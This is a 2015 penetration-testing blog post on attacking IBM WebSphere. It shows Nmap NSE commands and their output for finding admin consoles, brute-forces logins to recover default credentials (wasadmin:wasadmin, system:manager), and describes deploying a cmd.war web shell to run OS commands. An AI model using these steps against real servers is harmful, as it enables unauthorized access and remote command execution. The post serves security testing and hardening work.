Identifying and exploiting IBM WebSphere Application Server

July 13, 2015

IBM WebSphere is application server similar to Tomcat, JBoss and WebLogic. Therefore, it should be interesting to any penetration tester doing enterprise scale work where Websphere might be present. It should be also interesting to anyone who is working on securing enterprise environment since Websphere allows deploying own (malicious or not) code to the server.

I have written NSE scripts to identify IBM Websphere consoles of application servers and to brute force any usernames and passwords. I will also demonstrate basics of WebSphere exploitation.

In order to identify WebSphere consoles you will need NSEs available at https://github.com/kost/nmap-nse and you can clone git repository with following command:

git clone https://github.com/kost/nmap-nse.git

cd nmap-nse/scripts

I have submitted scripts for Nmap inclusion, but until scripts are not part of the Nmap you will have to download them from the repository above. Once NSE script is available, running nmap with WebSphere NSE script is simple:

nmap -p- -sV -sT --script=./http-websphere-console.nse 172.17.0.1

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-07-13 05:49 CEST

Nmap scan report for 172.17.0.1

Host is up (0.000049s latency).

Not shown: 65525 closed ports

PORT STATE SERVICE VERSION

28000/tcp open http IBM Tivoli Enterprise Portal (Servlet 3.0)

28001/tcp open ssl/http IBM Tivoli Enterprise Portal (Servlet 3.0)

| http-websphere-console:

| consoles:

|_ WebSphere at /ibm/console/logon.jsp?action=OK

28002/tcp open giop CORBA naming service

28003/tcp open ssl/http IBM WebSphere Application Server 8.0

|_http-server-header: WebSphere Application Server/8.0

28006/tcp open ssl/giop CORBA naming service

28007/tcp open ssl/unknown

28008/tcp open giop CORBA naming service

28009/tcp open unknown

28010/tcp open ssl/unknown

28020/tcp open ssl/unknown

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 24.13 seconds

As you can see from the port scan, NSE script identified WebSphere console available at URI: /ibm/console/logon.jsp?action=OK

If you go to that URI, you will be welcomed with username and password:

As you can see this is standard IBM WebSphere application server console. So, I have made another NSE script http-websphere-console-brute.nse which can help you with guessing username and password. Usage is simple:



nmap -p28001 -sV -sT --script=./http-websphere-console-brute.nse --script-args 'userdb=users.txt,passdb=passwd.txt' 172.17.0.1

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-07-13 06:30 CEST

Nmap scan report for 172.17.0.1

Host is up (0.00011s latency).

PORT STATE SERVICE VERSION

28001/tcp open ssl/http IBM Tivoli Enterprise Portal (Servlet 3.0)

| http-websphere-console-brute:

| Accounts:

| wasadmin:wasadmin – Valid credentials

|_ Statistics: Performed 1 guesses in 1 seconds, average tps: 1

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 22.76 seconds

As you can see NSE script guessed IBM WebSphere credentials: username wasadmin with password wasadmin. Another good credential to try is username system with password manager.

After successful username/password guess you can login to the console:

After successful login to the console, you can configure application server, install and deploy application. In case of attacker, usually that would consists of deploying cmd.war in order to execute operating system commands:

Next step would be going to cmd.war application URL and executing operating system commands. But, I guess you know how to go from here: it is simple and same with any application server.

References and further links

GitHub page:

https://github.com/kost/nmap-nse

Nmap-dev post:

http://seclists.org/nmap-dev/2015/q3/73

In this blog post, I have demonstrated basics of WebSphere exploitation. After this, I think you’re ready to explore following URLs:

http://erpscan.com/wp-content/uploads/pub/Penetration%20from%20application%20down%20to%20OS%20(IBM%20Websphere).pdf

http://www.securitytube.net/video/3298

Good luck with your IBM WebSphere adventures!